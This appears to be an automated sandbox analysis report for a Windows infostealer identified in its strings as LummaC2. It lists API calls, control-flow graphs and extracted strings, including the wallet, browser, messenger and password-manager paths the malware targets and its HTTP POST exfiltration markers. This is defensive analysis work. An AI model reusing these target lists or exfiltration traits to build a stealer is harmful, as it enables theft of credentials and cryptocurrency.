kkpllko576xeddjeloidieedojogacfhp576xedaihoh$kln576xedaejjgbibmhlephnh576xedpmaofohgkpgkd$kn576xedcchdigobgh576xedenbbaddojjnnaogfppfj$kpfop576xedkelmapcoipemfend576xedmdcghnegimn$lkcjl576xednjfpbikmcm576xedbachjpdbijejflpcm$lodccj576xedjbdhfakaekdiahmedf576xedbieldgik$mnfif576xedefkajgofkcjkemidiae576xedcocnkjeh$nanj576xedmdknhkinifnkgdcggcfnhd576xedaammmj$nhnk576xedbkgjikgcigadomkph576xedalanndcapjk$nkbihfbeo576xedgaeaoehlef576xednkodbefgpgknn$nkd576xeddgncdjgjfcddamfg576xedcmfnlhccnimig$nknhi576xedehlklippafakaeklbegl576xedecifhad$nlbm576xednnijcnlegkjjpcfjclm576xedcfggfefdm$nlgbh576xeddfgdhgbiamfdfmb576xedikcdghidoadd$oel576xedjdldpnmdbchonieli576xeddgobddffflal$onof576xedpnbbkehpmmoa576xedbgpcpmigafmmnjhl$ookjlb576xedkiijinhpmnjffcofj576xedonbfbgaoc$ppbibelpc576xedjmhbdihakflkd576xedcoccbgbkpo
                                                            • API String ID: 4038537762-1377293222
                                                            • Opcode ID: d76d7c670001a5dbd7c9de7b01bcafc77f6a8fb9cd7de87a96b03e98a683fc98
                                                            • Instruction ID: d3b4c8d05487b98e51841e16d8283d2e4e5c243acd67d22c1ca68150be5d60ea
                                                            • Opcode Fuzzy Hash: d76d7c670001a5dbd7c9de7b01bcafc77f6a8fb9cd7de87a96b03e98a683fc98
                                                            • Instruction Fuzzy Hash: 05E229F2E001065AEF2896588D8357F7969EB14304F25453FF80AF63D1EA3C8E558A9F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3053699869.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_I5jG2Os8GA.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: $jRk$%appd576xedata%\El576xedectrum\wal576xedlets$%appd576xedata%\Ethe576xedreum$%appd576xedata%\Op576xedera Softw576xedare\Op576xedera GX Sta576xedble$%appd576xedata%\Ope576xedra Soft576xedware\Op576xedera Sta576xedble$%appda576xedta%\Bina576xednce$%appda576xedta%\Mo576xedzilla\Fir576xedefox\Prof576xediles$%appda576xedta%\Op576xedera Softwa576xedre\Op576xedera Neo576xedn\Us576xeder Da576xedta$%appdata%\AnyDesk$%appdata%\Authy Desktop\Local Storage\leveldb$%appdata%\Bitcoin\wallets$%appdata%\Electrum\wallets$%appdata%\Exodus\exodus.wallet$%appdata%\FileZilla$%appdata%\Ledger Live$%appdata%\Telegram Desktop$%appdata%\atomic\Local Storage\leveldb$%appdata%\com.liberty.jaxx\IndexedDB$%lo576xedcalapp576xeddata%\Go576xedogle\Chr576xedome\Us576xeder Dat576xeda$%loc576xedalappda576xedta%\Kom576xedeta\Us576xeder Da576xedta$%locala576xedppdata%\Mic576xedrosoft\Edge\Us576xeder Data$%localappdata%\BraveSoftware\Brave-Browser\User Data$%localappdata%\Chro576xedmium\Use576xedr Data$%localappdata%\CocCoc\Browser\User Data$%localappdata%\Coinomi\Coinomi\wallets$%localappdata%\Comodo\Dragon\User Data$%programfiles%\Steam$%programfiles%\Steam\config$%userpro576xedfile%$%userprofile%$*.576xedtxt$*.conf$*.kbdx$*.leveldb$*576xed$.fin576xedger-pr576xedint.fp$?$@an($Aan($Aan($Applications/AnyDesk$Applications/FileZilla$Applications/KeePass$Applications/Steam$Applications/Steam/config$Applications/Telegram$Brave Software$Chr576xedome$Chromi576xedum$CocCoc$Comodo$Ed576xedge$Import576xedant File576xeds/Pro576xedfile$Kom576xedeta$Mozi576xedlla Firef576xedox$Op576xedera G576xedX Stab576xedle$Op576xedera Neo576xedn$Op576xedera Sta576xedble$ST4$TT4$TT4$Wal576xedlets/Bi576xednance$Wal576xedlets/Bin576xedance$Wall576xedets/Binan576xedce$Wall576xedets/Ele576xedctrum$Wall576xedets/Eth576xedereum$Wallets/Atomic$Wallets/Authy Desktop$Wallets/Bitcoin core$Wallets/Coinomi$Wallets/Electrum$Wallets/Exodus$Wallets/JAXX New Version$Wallets/Ledger Live$ap576xedp-sto576xedre.js576xedon$keyst576xedore$q7 C$recentservers.xml$sim576xedple-sto576xedrage.j576xedson$sitemanager.xml$ssfn*$y_B>
                                                            • API String ID: 0-3008219856
                                                            • Opcode ID: 89aa1017212fee1e620a7fbe6eb5b8cc1132262bae267c9db256cfec3297b749
                                                            • Instruction ID: b823253c8ecb5ad27e2b287cb1dce7157abede6b904688f5b513f038bfe6f5bb
                                                            • Opcode Fuzzy Hash: 89aa1017212fee1e620a7fbe6eb5b8cc1132262bae267c9db256cfec3297b749
                                                            • Instruction Fuzzy Hash: 71C207B1F002299BCF249B9AED4297E7970AB14300FE4453BE015FB391E67D89518B9F
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3053699869.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_I5jG2Os8GA.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: _strlen$CallbackDevicesDispatcherDisplayEnumUser
                                                            • String ID: Ver$$jRk$%s (%d.%d.%d)$- CP576xedU Name: $- HW576xedID: $- Phys576xedical Ins576xedtalled Memor576xedy: $- Screen Resoluton: $4jn`$4jn`$Aan($C: $GhYuIq$LID(Lu576xedmma ID): $Lum576xedmaC2, Build 20233101$Syste576xedm.txt$TT4$advapi32.dll$kernel32.dll$n._$n: $o._$o._$p7 C$q7 C$sion$user32.dll$x_B>$y_B>$y_B>
                                                            • API String ID: 3760342818-3740799521
                                                            • Opcode ID: 6304991c9ea5481c71fa155e6c83a9424bd06b545788eb0206d9441cc2e12171
                                                            • Instruction ID: 1dd07344ff1857ff55ac4e32df16f8dea444b4f0229405df86b90c0a9d587245
                                                            • Opcode Fuzzy Hash: 6304991c9ea5481c71fa155e6c83a9424bd06b545788eb0206d9441cc2e12171
                                                            • Instruction Fuzzy Hash: 710304B1504B419BDB349F29C88162BB7E0EB59310F24E92FE09BDB751D678E841CB1B
                                                            APIs
                                                            • lstrcmpW.KERNEL32(?,0045FD9A), ref: 0040C3B1
                                                            • lstrcatW.KERNEL32(?,?), ref: 0040C427
                                                            • lstrcatW.KERNEL32(?,0045E148), ref: 0040C431
                                                            • lstrlenW.KERNEL32(?), ref: 0040C581
                                                            • lstrcmpW.KERNEL32(?,0045FD96), ref: 0040C8D4
                                                            • lstrlenW.KERNEL32(00001A2F), ref: 0040C901
                                                            • lstrlenW.KERNEL32(00001A2F), ref: 0040D826
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3053699869.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_I5jG2Os8GA.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrlen$lstrcatlstrcmp
                                                            • String ID: "B!H$"B!H$K2&e$Ku^%$Ku^%$Ku^%$Ku^%$Ku^%$Ku^%$Ku^%$L2&e$L2&e$LOCK$Y[[T$\??\$bi$kernel32.dll$ntdll.dll${#9${#9$Y=`$Y=`
                                                            • API String ID: 156957741-3266097529
                                                            • Opcode ID: 586842b40f5e22ce16161be6ee07f9eaddf4cb437a7acc71fa442095b329c1f4
                                                            • Instruction ID: 88d54f90e21775ceda28cbcef53f0ea71a711b7076ec2cdd820ba9bac023bc57
                                                            • Opcode Fuzzy Hash: 586842b40f5e22ce16161be6ee07f9eaddf4cb437a7acc71fa442095b329c1f4
                                                            • Instruction Fuzzy Hash: 3CF2D4B2D002198BDF249F9888856BEB674EF54700F24453BE516FB3E0D7788A458B9F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3053699869.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_I5jG2Os8GA.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: "w$ "w$EeS$EeS$EeS$JI3i$KI3i$KI3i$VL6T$VL6T$_m.Q$_m.Q$eo>w$fo>w$fo>w$mNA/
                                                            • API String ID: 0-3469262258
                                                            • Opcode ID: 4c97abe84ae84427aa405d53373a48c981ee8d0905f9e59dac9583b8261a3c6c
                                                            • Instruction ID: 53dd30e2529ea33158ec6446975a809713fb297dce848eb7333cd10e9ac2b658
                                                            • Opcode Fuzzy Hash: 4c97abe84ae84427aa405d53373a48c981ee8d0905f9e59dac9583b8261a3c6c
                                                            • Instruction Fuzzy Hash: 8303F8B1E101298BCF28DB58D9856BEB7B5AB24300F64052FD415EB360D378CD868B9F
                                                            APIs
                                                            • lstrcatW.KERNEL32(?,C0E8A4B4), ref: 0040E55B
                                                            • lstrcatW.KERNEL32(?,0045E102), ref: 0040E565
                                                            • lstrcatW.KERNEL32(?,00000000), ref: 0040E7C3
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3053699869.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_I5jG2Os8GA.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcat
                                                            • String ID: !t8$"t8$"t8$(lu$)lu$)lu$Ied|$Ied|$Pz#$Pz#$kernel32.dll$n_v$n_v$u2B$v2B$v2B
                                                            • API String ID: 4038537762-116603239
                                                            • Opcode ID: 12bf652b1bb6dbd17e31e8eaa5e0b1f59006f58fc57be00d5560b6d267fe1625
                                                            • Instruction ID: 6ea63d0937669649ebb299a5b80ec071dd59a3ad312de0dc3acd440ddf73d718
                                                            • Opcode Fuzzy Hash: 12bf652b1bb6dbd17e31e8eaa5e0b1f59006f58fc57be00d5560b6d267fe1625
                                                            • Instruction Fuzzy Hash: C7E2ECB1D001199BDF248B99C9456BEBA71BB14304F24093BE506FF3D1D3798A92CB9B
                                                            APIs
                                                            • RtlAllocateHeap.NTDLL(?,00000000,?), ref: 00430F45
                                                            • GetProcessHeap.KERNEL32 ref: 004314B2
                                                            • HeapAlloc.KERNEL32(?,00000008,00000028), ref: 004314EB
                                                            • GetDIBits.GDI32(?,00000001,00000000,?,?,00000001,00000000), ref: 004321FA
                                                            • ReleaseDC.USER32(00000000,?), ref: 00432204
                                                            • GetProcessHeap.KERNEL32 ref: 004326F0
                                                            • RtlFreeHeap.NTDLL(00000000,00000000,?), ref: 004326FF
                                                            • GetProcessHeap.KERNEL32 ref: 00432701
                                                            • HeapFree.KERNEL32(00000000,00000000,00000001), ref: 00432708
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3053699869.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_I5jG2Os8GA.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Heap$Process$Free$AllocAllocateBitsRelease
                                                            • String ID: $jRk$?$TT4$TT4$q7 C$q7 C$y_B>$y_B>
                                                            • API String ID: 2023195035-2600574631
                                                            • Opcode ID: 5178d04942d301932e8b90fcb8df29a441936fb4bdecd8d5e545f1f0f99eb8d3
                                                            • Instruction ID: 86873c67e1170f8f17d23c3501641da2f07f81d3ce14e24acfbd45c3e0a97cea
                                                            • Opcode Fuzzy Hash: 5178d04942d301932e8b90fcb8df29a441936fb4bdecd8d5e545f1f0f99eb8d3
                                                            • Instruction Fuzzy Hash: 1FC2D771E001198BDF28CF98C9926BEB6B0AF5C314F24252BD515EB360D7789E41CB9B
                                                            APIs
                                                            • wsprintfW.USER32 ref: 004346DB
                                                            • RegEnumKeyExW.KERNELBASE(?,?,?,00000000,00000000,00000000,00000000,00000000,00000001), ref: 00434725
                                                            • RegCloseKey.KERNELBASE(?), ref: 0043475B
                                                            • RegOpenKeyExW.KERNELBASE(80000002,?,00000000,00020019,?,00000001), ref: 00434DA5
                                                            • RegCloseKey.ADVAPI32(?,00000001), ref: 00434F17
                                                            • RegCloseKey.ADVAPI32(?,00000001), ref: 00434F76
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3053699869.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_I5jG2Os8GA.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Close$EnumOpenwsprintf
                                                            • String ID: $jRk$$jRk$%s%s$%s\%s$?$DisplayName$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall$Software.txt$TT4$TT4$y_B>$y_B>
                                                            • API String ID: 44529101-205855365
                                                            • Opcode ID: dfa5f994e76983f3f8c4cf4d5fb617366fdece3346ca8abc111b64aa0c8d78cd
                                                            • Instruction ID: 3b7421bd9f904e401ff100dd7efef49cd6fe7be7401ce4d7a99a7b86551d2639
                                                            • Opcode Fuzzy Hash: dfa5f994e76983f3f8c4cf4d5fb617366fdece3346ca8abc111b64aa0c8d78cd
                                                            • Instruction Fuzzy Hash: E2621D70E002198BDF28CB9899455FEB674BF9C318F242517E625EB360D73CAD418B9B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3053699869.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_I5jG2Os8GA.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcat
                                                            • String ID: %appdata%\The Bat!$%localappdata%\The Bat!$(lu$)lu$*.ABD$*.EML$*.FLX$*.HBI$*.MSB$*.MSG$*.TBB$*.TBK$*.TBN$*.mbox$*.txt$Mail Clients\The Bat\AppData$Mail Clients\The Bat\Local$kernel32.dll$n_v$n_v
                                                            • API String ID: 4038537762-373908387
                                                            • Opcode ID: 9865856486611794f12a139d77c18e5c05c58a82ffa741dd00c0f22e25a9caec
                                                            • Instruction ID: 4f92dd08cf156959b88a3ca31d79465b6333db6cd064390b28fe5485dbf8b601
                                                            • Opcode Fuzzy Hash: 9865856486611794f12a139d77c18e5c05c58a82ffa741dd00c0f22e25a9caec
                                                            • Instruction Fuzzy Hash: 7042D7F1E0012A9BCF149A55AC5667F7B74EB51304FA8052BE405FA3A1E338CA5187DF

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 4850 405aaa-405ac0 4851 405ac3 4850->4851 4852 405ac9-405ad1 4851->4852 4853 405ad3-405ad8 4852->4853 4854 405b3c-405b41 4852->4854 4857 405ade-405ae3 4853->4857 4858 405b7f-405b84 4853->4858 4855 405b43-405b48 4854->4855 4856 405bbb-405bc0 4854->4856 4859 405c2e-405c33 4855->4859 4860 405b4e-405b53 4855->4860 4865 405ca3-405ca8 4856->4865 4866 405bc6-405bcb 4856->4866 4863 405ae9-405aee 4857->4863 4864 405bfd-405c02 4857->4864 4861 405c54-405c59 4858->4861 4862 405b8a-405b8f 4858->4862 4875 405e15-405e1a 4859->4875 4876 405c39-405c3e 4859->4876 4871 405d22-405d27 4860->4871 4872 405b59-405b5e 4860->4872 4879 405e3d-405e42 4861->4879 4880 405c5f-405c64 4861->4880 4877 405d74-405d79 4862->4877 4878 405b95-405b9a 4862->4878 4881 405af4-405af9 4863->4881 4882 405ce5-405cea 4863->4882 4873 405dc6-405dcb 4864->4873 4874 405c08-405c0d 4864->4874 4869 405e71-405e76 4865->4869 4870 405cae-405cb3 4865->4870 4867 405bd1-405bd6 4866->4867 4868 405dab-405db0 4866->4868 4883 405bdc-405be1 4867->4883 4884 405fcd-405fda 4867->4884 4887 4060a2-4060b3 4868->4887 4888 405db6-405dbb 4868->4888 4903 405e7c-405e81 4869->4903 4904 40617d-406197 call 4052a1 4869->4904 4905 405cb9-405cbe 4870->4905 4906 40602c-40604e 4870->4906 4913 406077-40608c 4871->4913 4914 405d2d-405d32 4871->4914 4907 405b64-405b69 4872->4907 4908 405f1c-405f5c call 404edc call 4048e2 4872->4908 4891 405dd1-405dd6 4873->4891 4892 4060c3-4060dd 4873->4892 4889 405c13-405c18 4874->4889 4890 405fdf-406009 4874->4890 4895 405e20-405e25 4875->4895 4896 4060e6 4875->4896 4893 405c44-405c49 4876->4893 4894 406018-406027 lstrcatW 4876->4894 4885 406091-40609d 4877->4885 4886 405d7f-405d84 4877->4886 4911 405fa0-405fc8 call 404988 4878->4911 4912 405ba0-405ba5 4878->4912 4901 405e48-405e4d 4879->4901 4902 4060fe-406109 4879->4902 4897 405c6a-405c6f 4880->4897 4898 40615f-406166 call 447047 4880->4898 4899 405ebc-405ee8 lstrcatW call 4360e1 lstrcatW * 2 4881->4899 4900 405aff-405b04 4881->4900 4909 405cf0-405cf5 4882->4909 4910 406059-406070 4882->4910 4883->4852 4932 405be7-405bf8 lstrcatW 4883->4932 4884->4852 4885->4852 4886->4852 4915 405d8a-405d9b 4886->4915 4945 406157-40615a 4887->4945 4946 4060b9-4060be 4887->4946 4918 405dc1 4888->4918 4919 406115-406129 4888->4919 4889->4852 4933 405c1e-405c29 4889->4933 4937 406010-406013 4890->4937 4938 40600b 4890->4938 4891->4852 4920 405ddc-405e05 4891->4920 4943 4060df-4060e4 4892->4943 4892->4945 4935 40619c-4061d6 call 4038d5 call 403a1c 4893->4935 4936 405c4f 4893->4936 4894->4852 4895->4852 4921 405e2b-405e38 4895->4921 4948 4060e7 4896->4948 4897->4852 4939 405c75-405c93 call 403600 4897->4939 4952 40616b-406178 4898->4952 4899->4852 4922 405b0a-405b0f 4900->4922 4923 405eed-405f17 lstrcatW call 4360e1 lstrcatW * 2 4900->4923 4901->4852 4924 405e53-405e5a call 447047 4901->4924 4930 40612e-406150 4902->4930 4949 40610b-406113 4902->4949 4903->4852 4925 405e87-405eac 4903->4925 4904->4852 4905->4852 4944 405cc4-405ce0 4905->4944 4940 406152 4906->4940 4941 406054 4906->4941 4926 405f6c-405f90 call 403600 4907->4926 4927 405b6f-405b74 4907->4927 4908->4945 4986 405f62-405f67 4908->4986 4909->4852 4947 405cfb-405d13 call 403e03 4909->4947 4942 406072 4910->4942 4910->4943 4911->4852 4929 405bab-405bb0 4912->4929 4912->4930 4913->4852 4914->4852 4950 405d38-405d64 4914->4950 4915->4945 4951 405da1-405da6 4915->4951 4918->4852 4919->4852 4920->4937 4955 405e0b-405e10 4920->4955 4921->4852 4922->4852 4956 405b11-405b31 4922->4956 4923->4852 4972 405e5f-405e6c 4924->4972 4925->4945 4958 405eb2-405eb7 4925->4958 4926->4945 4982 405f96-405f9b 4926->4982 4959 405d16-405d1d 4927->4959 4960 405b7a 4927->4960 4929->4852 4963 405bb6-40620a call 4360e1 call 40e14e 4929->4963 4930->4940 4930->4945 4932->4852 4933->4852 4987 4061d8 4935->4987 4988 4061dd-4061e0 4935->4988 4936->4852 4937->4852 4938->4937 4939->4945 4983 405c99-405c9e 4939->4983 4940->4945 4941->4945 4942->4945 4943->4945 4944->4852 4945->4852 4946->4945 4947->4959 4948->4948 4949->4898 4949->4919 4950->4937 4969 405d6a-405d6f 4950->4969 4951->4945 4952->4852 4955->4937 4956->4943 4971 405b37 4956->4971 4958->4945 4959->4852 4960->4852 4969->4937 4971->4945 4972->4852 4982->4945 4983->4945 4986->4945 4987->4988 4988->4851
                                                            APIs
                                                            • lstrcatW.KERNEL32(?,0045E102,?,?,00000000,?,?,004058C6), ref: 00405BEF
                                                            • lstrcatW.KERNEL32(00000000,?,?,?,?,00000000,?,?,004058C6), ref: 00405EC4
                                                            • lstrcatW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,?,004058C6), ref: 00405ED7
                                                            • lstrcatW.KERNEL32(00000000,?,?,?,?,?,00000000,?,?,004058C6), ref: 00405EDF
                                                            • lstrcatW.KERNEL32(?,?,?,?,?,00000000,?,?,004058C6), ref: 00405EF3
                                                            • lstrcatW.KERNEL32(?,00000000,?,?,?,?,00000000,?,?,004058C6), ref: 00405F06
                                                            • lstrcatW.KERNEL32(?,84D55917,?,?,?,?,00000000,?,?,004058C6), ref: 00405F0E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3053699869.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_I5jG2Os8GA.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcat
                                                            • String ID: *576xed$,$/Ext576xedensio576xedns/$\Loc576xedal Extens576xedion Settin576xedgs\$n_v$n_v
                                                            • API String ID: 4038537762-1578839816
                                                            • Opcode ID: 06c033a404d0e89150b013ef1b854d6f2c769d7e75bb802a7d794481f98f3895
                                                            • Instruction ID: e5bf92a8c3e4632e865b489cc3d7c979cf6fee557c11a145fed96966642f9e4d
                                                            • Opcode Fuzzy Hash: 06c033a404d0e89150b013ef1b854d6f2c769d7e75bb802a7d794481f98f3895
                                                            • Instruction Fuzzy Hash: 5FF1F9B1D006198BCF28DB98889657FBA74EB44300F25463BE506FA3D1D73C9A518F9B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3053699869.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_I5jG2Os8GA.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 9a%^$9a%^$9a%^$9a%^$Content-Type: multipart/form-data; boundary=%s$L%$M%$M%$POST$SqDe87817huf871793q74$TeslaBrowser/5.5$winhttp.dll
                                                            • API String ID: 0-485045143
                                                            • Opcode ID: 93238ce1bce5d0f96e870d474ccd94fa1ee818516e10118a3e8a746afefe7c00
                                                            • Instruction ID: c94fe321a93857c184b0378d7fc968df2dfc5883700fbc77eb7b7d771d47b6e9
                                                            • Opcode Fuzzy Hash: 93238ce1bce5d0f96e870d474ccd94fa1ee818516e10118a3e8a746afefe7c00
                                                            • Instruction Fuzzy Hash: 73521DB1E802058BDF288EE89CC56FE7AA1AB58304F24052BE515E6390D77CCDC1979F

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 5373 40620b-406227 5374 40622d-406235 5373->5374 5375 406237-40623c 5374->5375 5376 40627e-406283 5374->5376 5379 406242-406247 5375->5379 5380 4062ef-4062f4 5375->5380 5377 406289-40628e 5376->5377 5378 40633e-406343 5376->5378 5381 406294-406299 5377->5381 5382 40639b-4063a0 5377->5382 5387 406462-406467 5378->5387 5388 406349-40634e 5378->5388 5385 4063e7-4063ec 5379->5385 5386 40624d-406252 5379->5386 5383 406431-406436 5380->5383 5384 4062fa-4062ff 5380->5384 5393 4064df-4064e4 5381->5393 5394 40629f-4062a4 5381->5394 5395 406521-406526 5382->5395 5396 4063a6-4063ab 5382->5396 5391 406615-40661a 5383->5391 5392 40643c-406441 5383->5392 5399 406305-40630a 5384->5399 5400 406596-40659b 5384->5400 5403 4065e1-4065e6 5385->5403 5404 4063f2-4063f7 5385->5404 5401 406543-406548 5386->5401 5402 406258-40625d 5386->5402 5397 40664c-406651 5387->5397 5398 40646d-406472 5387->5398 5389 406354-406359 5388->5389 5390 40648f-406494 5388->5390 5423 4066f7-406715 5389->5423 5424 40635f-406364 5389->5424 5417 40649a-40649f 5390->5417 5418 4066ae-4066d0 5390->5418 5415 406620-406625 5391->5415 5416 406773-406784 lstrcatW 5391->5416 5407 406825-406840 call 419e6b 5392->5407 5408 406447-40644c 5392->5408 5425 4066e0-4066f2 call 447a80 5393->5425 5426 4064ea-4064ef 5393->5426 5409 406789-4067ad call 404822 5394->5409 5410 4062aa-4062af 5394->5410 5427 406683-40668a 5395->5427 5428 40652c-406531 5395->5428 5429 4063b1-4063b6 5396->5429 5430 4067b2-4067d4 5396->5430 5421 406845-40686e 5397->5421 5422 406657-40665c 5397->5422 5413 406478-40647d 5398->5413 5414 40668f-4066a9 5398->5414 5419 406310-406315 5399->5419 5420 4064c4-4064c7 5399->5420 5405 406750-406762 call 447a80 5400->5405 5406 4065a1-4065a6 5400->5406 5431 40671a-406740 5401->5431 5432 40654e-406553 5401->5432 5433 406263-406268 5402->5433 5434 4067e4-4067fd call 447047 5402->5434 5411 406767-40676e 5403->5411 5412 4065ec-4065f1 5403->5412 5435 406802-40680d lstrcatW call 40b7bb 5404->5435 5436 4063fd-406402 5404->5436 5405->5374 5406->5374 5437 4065ac-4065d1 5406->5437 5407->5374 5459 406452-406457 5408->5459 5460 406948-406956 5408->5460 5409->5374 5438 4068b5-4068bc 5410->5438 5439 4062b5-4062ba 5410->5439 5411->5374 5412->5374 5440 4065f7-406610 call 447047 5412->5440 5463 406483-40648a 5413->5463 5464 40695b-406960 5413->5464 5414->5374 5415->5374 5441 40662b-40663c 5415->5441 5416->5374 5417->5374 5466 4064a5-4064b0 5417->5466 5446 4066d6-4066db 5418->5446 5447 40691a-40691d 5418->5447 5442 4068f5-406913 5419->5442 5443 40631b-406320 5419->5443 5469 4064c8 5420->5469 5467 406870 5421->5467 5468 406875-406878 5421->5468 5444 406662-40667e lstrcatW * 2 5422->5444 5445 406968-40696d 5422->5445 5423->5374 5448 40636a-40636f 5424->5448 5449 40687d-4068ac call 404a00 5424->5449 5425->5374 5426->5374 5470 4064f5-40651a 5426->5470 5427->5374 5428->5374 5471 406537-40653e 5428->5471 5452 4068c1-4068c7 5429->5452 5453 4063bc-4063c1 5429->5453 5430->5447 5458 4067da-4067df 5430->5458 5431->5447 5451 406746-40674b 5431->5451 5432->5374 5472 406559-406586 call 403ac1 call 404f5e 5432->5472 5473 4068d9-4068ec call 403c98 5433->5473 5474 40626e-406273 5433->5474 5434->5374 5491 406812-40681c 5435->5491 5456 406922-406943 lstrcatW * 2 5436->5456 5457 406408-40640d 5436->5457 5437->5447 5476 4065d7-4065dc 5437->5476 5438->5374 5439->5374 5478 4062c0-4062e4 5439->5478 5440->5374 5441->5447 5480 406642-406647 5441->5480 5442->5447 5499 406915 5442->5499 5443->5374 5481 406326-406339 5443->5481 5444->5374 5445->5374 5477 406973-406991 call 404c9c 5445->5477 5446->5447 5447->5374 5448->5374 5482 406375-406387 call 40b129 5448->5482 5449->5447 5512 4068ae-4068b3 5449->5512 5451->5447 5488 4068cd-4068d4 5452->5488 5453->5374 5484 4063c7-4063d7 5453->5484 5456->5374 5457->5374 5487 406413-40642c lstrcatW * 2 5457->5487 5458->5447 5459->5488 5489 40645d 5459->5489 5460->5374 5463->5374 5464->5374 5475 406966 5464->5475 5466->5437 5493 4064b6-4064be 5466->5493 5467->5468 5468->5374 5469->5469 5495 40658c-406591 5470->5495 5496 40651c 5470->5496 5471->5374 5472->5447 5472->5495 5473->5447 5513 4068ee-4068f3 5473->5513 5474->5374 5500 406275-40627c 5474->5500 5501 406996-4069a0 5475->5501 5476->5447 5477->5501 5503 4062ea 5478->5503 5504 4063dd-4063e2 5478->5504 5480->5447 5481->5374 5511 40638c-406396 5482->5511 5484->5447 5484->5504 5487->5374 5488->5374 5489->5374 5491->5468 5507 40681e-406823 5491->5507 5493->5420 5493->5427 5495->5447 5496->5447 5499->5447 5500->5374 5503->5447 5504->5447 5507->5468 5511->5374 5512->5447 5513->5447
                                                            APIs
                                                            • lstrcatW.KERNEL32(?,0045E102), ref: 0040641B
                                                            • lstrcatW.KERNEL32(?,?), ref: 00406423
                                                            • lstrcatW.KERNEL32(?,?), ref: 0040692A
                                                            • lstrcatW.KERNEL32(?,0045E102), ref: 00406934
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3053699869.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_I5jG2Os8GA.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcat
                                                            • String ID: Ku^%$Ku^%$Y=`$Y=`
                                                            • API String ID: 4038537762-3617128223
                                                            • Opcode ID: 8aca2622c3c3d1db70070bb2a5585c4558611a8a3d103d468629aeb63b1ff0ca
                                                            • Instruction ID: 9c9fa2152e9cc94146e123e662ad7e189f6101f2fbba187f29f17e96b34d8480
                                                            • Opcode Fuzzy Hash: 8aca2622c3c3d1db70070bb2a5585c4558611a8a3d103d468629aeb63b1ff0ca
                                                            • Instruction Fuzzy Hash: 72F11AB1D0010A9BCF249E9898815BE7A70AB54304F264D3BE517FA3E4D37CCD619B5B

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
